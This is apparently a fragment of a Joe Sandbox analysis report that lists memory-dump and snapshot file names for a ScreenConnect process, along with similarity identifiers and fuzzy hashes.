                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.2533314715.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff848f40000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MitigationPolicyProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1088084561-0
                                                                                                                                                                                • Opcode ID: 1140de9e8585e7afb96131391540e5bcfa84b6606e5be4fbf07b558a0783237d
                                                                                                                                                                                • Instruction ID: 656a280f07d16c5b80d6c6ed534e36683fb13ed49cb00fbcd534b7abd8c5a60d
                                                                                                                                                                                • Opcode Fuzzy Hash: 1140de9e8585e7afb96131391540e5bcfa84b6606e5be4fbf07b558a0783237d
                                                                                                                                                                                • Instruction Fuzzy Hash: E421D73191CB188FDB18AF9CD84A6FA77E0EB65711F00413FE04AD3651DB74B8458B95